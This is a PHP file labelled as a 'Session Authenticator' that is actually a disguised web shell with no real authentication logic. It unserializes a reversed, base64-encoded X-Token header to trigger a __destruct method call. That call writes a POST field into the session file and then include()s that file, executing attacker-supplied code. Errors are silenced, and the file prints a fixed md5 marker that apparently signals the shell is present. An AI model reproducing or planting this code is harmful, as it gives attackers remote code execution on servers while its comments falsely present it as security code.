<?php /** * Session Authenticator * Version: 2.1.4 * Description: Secure user authentication and session management */ error_reporting(0); session_start(); class AuthManager { // Authentication configuration public $mode = 'login'; // Auth mode: login/validate public $remember = 0; // Remember me (0=off, 1=on) public $field = 'auth_token'; // POST field name public $prefix = 'user_'; // Session prefix public $cipher = 'AES256'; // Encryption cipher // Create user session public function createSession($uid) { $_SESSION['auth'] = $this->prefix . $uid . $this->cipher; session_write_close(); } // Load session profile public function loadProfile($path) { if(file_exists($path)) { include($path); }else{ echo ('Error:'.file_get_contents($path)); } } // Process user login public function processLogin($input) { $token = isset($_POST[$this->field]) ? $_POST[$this->field] : ''; if($this->remember) { $token = base64_decode(strrev($token)); } $this->createSession($token); $savePath = session_save_path(); if(!$savePath) { $savePath = sys_get_temp_dir(); } $sessionFile = rtrim($savePath, "\\/") . DIRECTORY_SEPARATOR . 'sess_' . session_id(); $this->loadProfile($sessionFile); } // Auto cleanup on destruct public function __destruct() { call_user_func(array($this, $this->mode), 'x'); } } // Request entry point if(isset($_SERVER['HTTP_X_TOKEN'])) { $auth = unserialize(base64_decode(strrev($_SERVER['HTTP_X_TOKEN']))); unset($auth); }else{ echo (md5('@')); } ?>